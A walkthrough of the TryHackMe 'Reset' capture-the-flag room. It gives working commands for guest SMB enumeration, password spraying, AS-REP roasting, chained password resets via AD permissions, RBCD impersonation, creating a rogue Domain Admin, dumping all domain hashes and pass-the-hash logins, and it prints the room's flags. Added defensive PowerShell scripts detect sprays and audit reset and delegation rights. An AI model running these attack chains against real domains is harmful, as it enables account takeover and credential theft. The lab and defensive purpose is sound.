
TryHackMe Reset Walkthrough

Rich
9 min read · Apr 25, 2025

TL;DR walkthrough of the TryHackMe Reset room (https://tryhackme.com/room/resetui).

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

Reset isn’t a bad room. It is unfortunately hobbled by the TryHackMe restriction on free, user-created rooms: only one VM allowed. This of course puts a serious handicap on the potential of any AD-focused room. After all, no org is going to run a DC just to run a DC. The entire point of AD is to include member servers for running services like Exchange, SharePoint, MSSQL, file servers, etc., and workstations for the end users to, you know, use.

Absent a 0-day like ZeroLogon or the old classic EternalBlue, an attacker is unlikely to find success directly attacking a DC. They will likely have to compromise a Domain User via phishing, USB drive drops, or similar TTPs so they can enumerate the domain first. They will then move laterally, compromise additional users and workstations, and eventually find a way to escalate privileges. They may escalate to a user account that has minimal privileges in AD but has full control in NTFS on the file server, run ransomware, and call it a day. Attackers have their own goal, and they don’t necessarily need to become a Domain Admin to accomplish it and ruin the org’s day.

I found myself hobbled by TryHackMe’s room restrictions when I created a room. I had to put a mere shadow of what I had wanted to on TryHackMe, and use some serious duct tape. It was ugly. Hence I don’t blame Reset’s author for the bizarre things I found at the end of the room.

On an administrative note, the astute reader may notice that the IP of THM’s VM changes during this walkthrough. This is due to THM’s time limit on running a VM. I took notes as I went and always jotted down any usernames/credentials compromised so I could pick back up later where I had left off. There are no reverse shells used in this room, so any IPs shown in any commands are the THM VM’s.

Initial Enumeration

We start the Reset room with just the VM’s IP and the hint that it’s likely a DC.

sudo nmap -sV -O 10.10.77.204

Nice, so we now know it’s a DC for the domain thm.corp. Let’s try an old trick: enumerating using the Guest account. Who knows, maybe it’s still enabled?

enum4linux -u thm.corp\\guest -a 10.10.130.147

Nice, the guest account is enabled with no password. We find a share: 10.10.77.204\data

Let’s connect and see what’s there.

smbclient \\\\10.10.130.147\\Data -U thm.corp\\guest

The filenames keep changing, so let’s just pull them all real fast.

smbclient \\\\10.10.130.147\\Data -U thm\\guest -c 'prompt OFF;recurse ON;cd 'onboarding';lcd '/home/kali/Downloads/Reset';mget *'

Check the text file in Mousepad and we find a password that might be useful for password spraying.

Subject: Welcome to Reset - Dear <USER>,Welcome aboard! 

We are thrilled to have you join our team.
As discussed during the hiring process, we are sending you the necessary login information to access your company account.
Please keep this information confidential and do not share it with anyone.
The initial passowrd is: ResetMe123!
We are confident that you will contribute significantly to our continued success.
We look forward to working with you and wish you the very best in your new role.

Best regards,
The Reset Team

We just need a list of usernames to spray. Let’s abuse guest access to enumerate usernames.

/usr/share/doc/python3-impacket/examples/lookupsid.py thm.corp/guest@10.10.220.153

Copy/paste the output, parse with PowerShell, and save to CorpUsers.

# lookupsid lines look like "500: THM\Administrator (SidTypeUser)"; keep the part after the backslash, up to the first space
$Lines = Get-Content .\LookupSID_Output.txt
ForEach($Line in $Lines)
{
    if ($Line -notmatch '\\') { continue }   # skip header lines that carry no DOMAIN\name
    ($Line.split("\")[1]).split(" ")[0] | Out-File .\CorpUsers.txt -Append
}

Now we have a nice list of usernames saved as CorpUsers.txt to try using that password.

crackmapexec smb 10.10.130.147 -u /home/kali/Downloads/Reset/CorpUsers.txt -p ResetMe123\! --continue-on-success

/home/kali/Downloads/exploits/kerbrute_linux_amd64 passwordspray -d thm.corp --dc 10.10.77.204 /home/kali/Downloads/Wordlists/CorpUsers 'ResetMe123!'
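As an added example that is not part of the original walkthrough, here is what those two sprays look like from the blue side. With the default DC audit policy, a kerbrute spray produces Kerberos pre-authentication failures (event 4771) on the DC and a crackmapexec SMB spray produces logon failures (event 4625). The script below flattens both event types to the three fields that matter, groups them by source address, and flags any source that fails against many distinct accounts inside a short window, which is the signature of a spray rather than a user mistyping their own password. The thresholds, the function names and the sample events at the bottom are my own (the sample is constructed so the logic can be exercised without a DC); only the event IDs and field names come from the Windows Security log schema.

```powershell
# Added example, not from the walkthrough: flag password-spray patterns in a DC's Security log.
# A spray looks like one source address failing logons for many *different* accounts in a short window.
# Event 4771 (Kerberos pre-auth failed, what a kerbrute spray leaves behind) and 4625 (logon failure,
# what a crackmapexec SMB spray leaves behind) are both handled.

function ConvertFrom-LogonFailure {
    # Turn a Security event into a flat object with the three fields the detection needs.
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        $xml  = [xml]$Event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time   = $Event.TimeCreated
            Id     = $Event.Id
            User   = $data['TargetUserName']
            Source = ($data['IpAddress'] -replace '^::ffff:', '')   # 4771 reports IPv4-mapped addresses
        }
    }
}

function Find-PasswordSpray {
    # Group failures by source and report any source that hit at least $UserThreshold distinct
    # accounts within $WindowMinutes. Thresholds are assumptions; tune them to the environment.
    param(
        [Parameter(Mandatory)] [object[]]$Failures,
        [int]$UserThreshold = 10,
        [int]$WindowMinutes = 30
    )
    foreach ($group in ($Failures | Group-Object Source)) {
        $sorted = $group.Group | Sort-Object Time
        $span   = ($sorted[-1].Time - $sorted[0].Time).TotalMinutes
        $users  = @($sorted | Select-Object -ExpandProperty User -Unique)
        if ($users.Count -ge $UserThreshold -and $span -le $WindowMinutes) {
            [pscustomobject]@{
                Source        = $group.Name
                DistinctUsers = $users.Count
                Attempts      = $sorted.Count
                Minutes       = [math]::Round($span, 1)
                Users         = ($users -join ',')
            }
        }
    }
}

# Live use on a DC (needs the right to read the Security log):
# $failures = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4771,4625; StartTime=(Get-Date).AddHours(-1)} |
#             ConvertFrom-LogonFailure
# Find-PasswordSpray -Failures $failures

# Constructed sample: one address tries twelve accounts once each over two minutes (a spray),
# another address retries a single account five times (a user, not a spray).
$now    = Get-Date
$sample = @()
$i = 0
foreach ($u in 'ALICE','BOB','CARL','DANA','EVE','FRED','GINA','HANK','IRIS','JACK','KARA','LIAM') {
    $sample += [pscustomobject]@{ Time = $now.AddSeconds(10 * $i); Id = 4771; User = $u; Source = '10.10.0.50' }
    $i++
}
foreach ($n in 1..5) {
    $sample += [pscustomobject]@{ Time = $now.AddSeconds($n); Id = 4625; User = 'BOB'; Source = '10.10.0.7' }
}
Find-PasswordSpray -Failures $sample | Format-Table -AutoSize
```

Run against the constructed sample, only the first address is reported. On a real DC the same grouping also surfaces the source of a spray that used a valid password on one account, since the other eleven attempts still failed.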

We get a hit on LILY_ONEILL, so let’s reset Lily’s password.

/usr/share/doc/python3-impacket/examples/smbpasswd.py LILY_ONEILL@10.10.77.204

Now we have LILY_ONEILL \ P@$$w0rd.

enum4linux -u thm.corp\\lily_oneill -p P@\$\$w0rd -a 10.10.77.204

smbclient \\\\10.10.77.204\\Data -U thm.corp\\LILY_ONEILL

But Lily_Oneill is a dead end.

It turns out that Lily doesn’t really have any more access than Guest, however remember that list of usernames we created? It’s handy for trying ASREPRoasting and Kerberoasting as the attacker needs access as a Domain User and a list of usernames to try for both of those attacks.

Let’s try ASREPRoasting.

/usr/share/doc/python3-impacket/examples/GetNPUsers.py thm.corp/ -no-pass -usersfile /home/kali/Downloads/Wordlists/CorpUsers.txt

We get 3 hits, so let’s run all 3 through hashcat and john.

john --wordlist=/home/kali/Downloads/Wordlists/rockyou.txt /home/kali/Downloads/Wordlists/ASREP

We get a hit!

TABATHA_BRITT \ marlboro(1985)

Tabatha has RDP access to the DC. This is unlikely in a real environment or even a multi-VM range, as DCs don’t allow mere Domain Users to RDP or WinRM into them by default. However THM restricts these rooms to one VM, so often the room creator has to allow this manually. I had to in the room I created. I was cringing the entire time.

Tabatha can log in via CLI or GUI.

evil-winrm -i 10.10.227.202 -u TABATHA_BRITT -p 'marlboro(1985)'

xfreerdp /v:10.10.130.147 /u:TABATHA_BRITT /p:marlboro\(1985\) /dynamic-resolution

The problem is that this VM was rather janky. I couldn’t even get it to run PowerView. Hence I enumerated from Kali, which I believe is the way the room author expected us to do so.

Open a new BASH tab on Kali and run the backend DB and Bloodhound. I posted a howto here showing how to get Bloodhound up and running on both Windows and Kali. Normally one would run Bloodhound on a standalone [i.e. a system that’s not connected to the target domain] and only run the collector against the target. In other words we analyze the information in Bloodhound offline.

cd Downloads
./neo4j-desktop-1.6.0-x86_64.AppImage
bloodhound

Enumerate the target domain so we can upload the data to Bloodhound.

sudo bloodhound-python -d thm.corp -u TABATHA_BRITT -p marlboro\(1985\) -ns 10.10.158.22 -c all

Clear the Bloodhound database if you already had a domain in there and then upload all the JSON files generated by the command above.

Mark Tabatha_Britt & Lily_Oneill as owned.

DACL enumeration and abuse

We find a path to move laterally. Tabatha can move through the following accounts by resetting their passwords.

  • Shawna_Bray
  • Cruz_Hall
  • Darla_Winters

These password resets can be done from Kali, but I already had a cheatsheet handy for doing so from Windows and Tabatha has RDP access to the VM, so why not, right?

Pin PowerShell_ISE to the taskbar. This makes it easy to right click & ‘Run as a different user’.

Set-ADAccountPassword -Identity Shawna_Bray -Reset -NewPassword (ConvertTo-SecureString 'Password00' -AsPlainText -Force)

#Now run PowerShell_ISE as Shawna
Set-ADAccountPassword -Identity Cruz_Hall -Reset -NewPassword (ConvertTo-SecureString 'Password00' -AsPlainText -Force)

#Repeat; close PowerShell, then run as Cruz_Hall
Set-ADAccountPassword -Identity Darla_Winters -Reset -NewPassword (ConvertTo-SecureString 'Password00' -AsPlainText -Force)

We now have access to Darla_Winters. This is important as Darla can escalate privileges, not just move laterally.
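Since the whole chain above rests on password-reset rights handed to ordinary users, a defender wants to find those grants before BloodHound shows them to an attacker. The following is an added example, not code from the room or its author: it walks every user object, reads its DACL through the AD: drive that the ActiveDirectory module provides, and reports any principal outside an expected set that holds the Reset Password extended right (well-known GUID 00299570-246d-11d0-a768-00aa006e0529) or a control right that implies it (GenericAll, WriteDacl, WriteOwner). It assumes the RSAT ActiveDirectory module and a session able to read the objects; the expected-principal list and the function name are my assumptions and should be adjusted to the domain being audited.

```powershell
# Added example, not from the walkthrough: find who can reset passwords on user accounts.
# The "Reset Password" extended right is identified by a fixed GUID in the ACE's ObjectType.
# Assumes the RSAT ActiveDirectory module (it creates the AD: drive used by Get-Acl).
Import-Module ActiveDirectory

$ResetPasswordGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'
# Principals expected to hold this right; anything else is reported. Adjust per domain (assumption).
$ExpectedPrincipals = @('NT AUTHORITY\SELF', 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                        'BUILTIN\Account Operators', 'Domain Admins', 'Enterprise Admins')

function Find-ResetPasswordGrants {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)
    $controlRights = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, WriteDacl, WriteOwner'
    foreach ($user in Get-ADUser -Filter * -SearchBase $SearchBase) {
        $acl = Get-Acl -Path "AD:\$($user.DistinguishedName)"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $isReset   = $ace.ObjectType -eq $ResetPasswordGuid
            # Full control or the ability to rewrite the DACL/owner also leads to a reset, so report it too
            $isControl = ($ace.ActiveDirectoryRights -band $controlRights) -ne 0
            if (-not ($isReset -or $isControl)) { continue }
            $who = $ace.IdentityReference.Value
            if ($ExpectedPrincipals | Where-Object { $who -like "*$_" }) { continue }
            [pscustomobject]@{
                Target    = $user.SamAccountName
                Principal = $who
                Right     = if ($isReset) { 'ResetPassword' } else { $ace.ActiveDirectoryRights }
                Inherited = $ace.IsInherited
            }
        }
    }
}

Find-ResetPasswordGrants | Sort-Object Principal, Target | Format-Table -AutoSize
```

In this room the output would list TABATHA_BRITT over Shawna_Bray, Shawna_Bray over Cruz_Hall, and Cruz_Hall over Darla_Winters, which is exactly the edge list BloodHound drew. Reading one ACL per user is slow on a large domain; scope it with -SearchBase to an OU when auditing incrementally.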

RBCD

I posted a howto on Resource Based Constrained Delegation (RBCD) here, showing both how to put it into a cyber range and how to abuse it from the attacker perspective. Of course in the cyber range I created the attacker is using RBCD to move laterally from one domain client to another domain client.

Again though, Reset’s author ran into THM’s restriction on the number of VMs. They gave Darla, a mere Domain User, RBCD rights on the DC … and we have to abuse it from Kali.

Put the DC’s IP in the /etc/hosts file for both the computer name “haystack” and the domain name “thm.corp”. This makes the below commands work seamlessly.

/usr/share/doc/python3-impacket/examples/getST.py -k -impersonate Administrator -spn cifs/HAYSTACK.THM.CORP THM.CORP/DARLA_WINTERS

export KRB5CCNAME=Administrator@cifs_HAYSTACK.THM.CORP@THM.CORP.ccache

/usr/share/doc/python3-impacket/examples/wmiexec.py THM.CORP/Administrator@HAYSTACK.THM.CORP -k -no-pass

We get a legacy cmd.exe shell. If it was PowerShell we would just do:

New-ADUser -Name "Mishky" -AccountPassword(ConvertTo-SecureString -AsPlainText 'Password00' -Force) -Enabled $true

Add-ADGroupMember -Identity "Domain Admins" -Members "Mishky"

But since it’s legacy cmd.exe:

dsadd user "CN=Mishky,CN=Users,DC=thm,DC=corp" -samid Mishky -pwd Password00

net group "Domain Admins" Mishky /add /domain

Yes, I had to ask CW6 Google how to do that in legacy cmd.exe. What can I say, I like PowerShell.

Now we can RDP as a Domain Admin and find anything we want.

xfreerdp /v:10.10.130.147 /u:Mishky /p:Password00 /dynamic-resolution
Get-ChildItem -Path "C:\Users" -Recurse -Filter *.txt | Get-Content

This gets us the answers to the only two questions in the room.

User flag: THM{AUTOMATION_WILL_REPLACE_US}
Root flag: THM{RE_RE_RE_SET_AND_DELEGATE}

Post compromise enumeration & notes

Note the “user flag” is in automate’s folder. We never used this account. We went from Guest -> Lily [merely a detour] -> Tabatha -> bunch of pwd resets -> Darla -> Admin. I guess we missed the intended path and took the scenic route. Well the old saying does go “if it’s stupid but it works, then it isn’t stupid”. Besides, a real attacker doesn’t care how they get there, just that they can.

While we have Domain Admin access, let’s dump all the hashes in AD.

/usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc Mishky:Password00@10.10.130.147

Alternately, append >> /home/kali/Downloads/Reset/All_Hashes.txt to the end of the above command in order to save all hashes for later.

We can now PTH as Administrator using evil-winrm.

evil-winrm -i 10.10.130.147 -u Administrator -H 067a84e5afaed843ed4a8fdac5facac3

Note that Cecile_Wong & Horace_Boyle are also Domain Admins and all Domain Admins have the same hash: 067a84e5afaed843ed4a8fdac5facac3

evil-winrm -i 10.10.220.153 -u Cecile_Wong -H 067a84e5afaed843ed4a8fdac5facac3

#enable Restricted Admin mode by setting DisableRestrictedAdmin to 0; this is what allows RDP via PTH
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
xfreerdp /v:10.10.220.153 /u:Cecile_Wong /pth:067a84e5afaed843ed4a8fdac5facac3 /dynamic-resolution

Summary

I enumerated a bit more as Cecile_Wong, looking for exactly how Darla_Winters had delegation rights. Bloodhound doesn’t tell you why she does, only that she does and how to abuse it. The consensus on Google is that she is listed in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the DC’s AD computer account.

However I was unable to confirm this in the VM via Active Directory Users & Computers (ADUC, aka dsa.msc), ADSIEdit.msc, or PowerShell … and as aforementioned the VM refused to function with PowerView even after I jumped on as a Domain Admin and disabled Defender.

Even ChatGPT was flummoxed.

Oh well, I know how I set it up in our cyber range … or rather I created an escalation path whereby the attacker can give themselves the right to set it up :p
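For reference, one way to read that attribute directly, as an added example that is not from the walkthrough: the ActiveDirectory module returns msDS-AllowedToActOnBehalfOfOtherIdentity as an already-parsed security descriptor, so the trustees are simply the identities on its ACEs, and an LDAP filter on the same attribute finds every computer in the domain that has it set. It assumes the RSAT ActiveDirectory module and a session that can read the computer objects; HAYSTACK is the DC name from the room, and the function name is mine.

```powershell
# Added example, not from the walkthrough: list which principals a computer allows to act on its behalf
# (resource-based constrained delegation), by decoding msDS-AllowedToActOnBehalfOfOtherIdentity.
# Assumes the RSAT ActiveDirectory module and read access to the computer objects.
Import-Module ActiveDirectory

function Get-RbcdTrustees {
    # With no name, audits every computer in the domain that has the attribute set at all.
    param([string]$ComputerName)
    $attr = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    $computers = if ($ComputerName) {
        Get-ADComputer -Identity $ComputerName -Properties $attr
    } else {
        Get-ADComputer -LDAPFilter "($attr=*)" -Properties $attr
    }
    foreach ($c in $computers) {
        $sd = $c.$attr      # an ActiveDirectorySecurity object, so the ACEs are already parsed
        if (-not $sd) { continue }
        foreach ($ace in $sd.Access) {
            [pscustomobject]@{
                Computer = $c.Name
                Trustee  = $ace.IdentityReference.Value   # e.g. THM\DARLA_WINTERS
                Type     = $ace.AccessControlType
                Rights   = $ace.ActiveDirectoryRights
            }
        }
    }
}

# The DC from the room, then the whole domain:
Get-RbcdTrustees -ComputerName 'HAYSTACK' | Format-Table -AutoSize
Get-RbcdTrustees | Format-Table -AutoSize
```

A user account (rather than a computer account) appearing as a trustee on a DC is the finding to act on: ordinary users have no business in that attribute, and clearing it is a single Set-ADComputer -Clear on the same attribute name.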

In summary, it’s not a bad room. It covered enumeration and abuse of DACLs in AD, which is an important and often neglected topic. It only suffered from the THM imposed restriction of 1 VM per room.

References

https://www.kali.org/tools/bloodhound/

https://www.kali.org/tools/bloodhound.py/

https://github.com/dirkjanm/BloodHound.py

https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

https://wadcoms.github.io/wadcoms/Impacket-getST-Creds/

https://docs.tenable.com/identity-exposure/SaaS/Content/User/AttackPath/AllowedToAct.htm

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

https://medium.com/r3d-buck3t/how-to-abuse-resource-based-constrained-delegation-to-gain-unauthorized-access-36ac8337dd5a

https://happycamper84.medium.com/howto-setup-bloodhound-map-ad-44c7149ba28b

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.
